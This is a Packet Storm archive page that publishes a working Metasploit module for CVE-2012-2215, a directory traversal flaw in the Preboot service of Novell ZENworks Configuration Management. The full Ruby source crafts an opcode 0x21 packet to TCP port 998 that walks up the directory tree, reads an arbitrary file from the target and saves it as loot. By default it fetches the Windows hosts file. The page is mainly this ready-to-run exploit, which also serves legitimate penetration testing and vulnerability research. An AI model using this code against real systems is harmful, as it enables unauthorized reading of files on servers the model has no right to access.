what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Novell ZENworks Configuration Management Preboot Service Remote File Access

Novell ZENworks Configuration Management Preboot Service Remote File Access
Posted Sep 1, 2024
Authored by Luigi Auriemma, juan vazquez | Site metasploit.com

This Metasploit module exploits a directory traversal in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This Metasploit module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.

tags | exploit, tcp
systems | windows
advisories | CVE-2012-2215
SHA-256 | c8558ecefbfe751f2fc66900fb57a9cf3f672074e3a5a9c539be4d79127c10fb

Novell ZENworks Configuration Management Preboot Service Remote File Access

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Configuration Management Preboot Service Remote File Access',
'Description' => %q{
This module exploits a directory traversal in the ZENworks Configuration Management.
The vulnerability exists in the Preboot service and can be triggered by sending a specially
crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been
successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-2215' ],
[ 'OSVDB', '80230' ],
[ 'URL', 'https://web.archive.org/web/20121103122235/http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]
]
))

register_options(
[
Opt::RPORT(998),
OptString.new('FILEPATH', [true, 'The name of the file to download', '\\WINDOWS\\system32\\drivers\\etc\\hosts']),
OptInt.new('DEPTH', [true, 'Traversal depth', 6])
])
end

def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("Please supply the name of the file you want to download")
return
end

travs = "\\.." * datastore['DEPTH']
travs << "\\" unless datastore['FILEPATH'][0] == "\\"
travs << datastore['FILEPATH']

payload = Rex::Text.to_unicode(travs)
packet = [0x21].pack("N") # Opcode
packet << [payload.length].pack("N") # Length
packet << payload # Value

connect
sock.put(packet)
sock.get_once(4, 1)
length = sock.get_once(4, 1)

unless length
print_error("Unable to get length due to a timeout")
return
end

sock.get_once(0x210-8, 1)
contents = sock.get_once(length.unpack("V").first, 1)

unless contents
print_error("Unable to extract contents due to a timeout")
return
end

disconnect

print_good "File retrieved successfully!"
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'novell.zenworks_configuration_management',
'application/octet-stream',
ip,
contents,
fname
)
print_status("File saved in: #{path}")
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close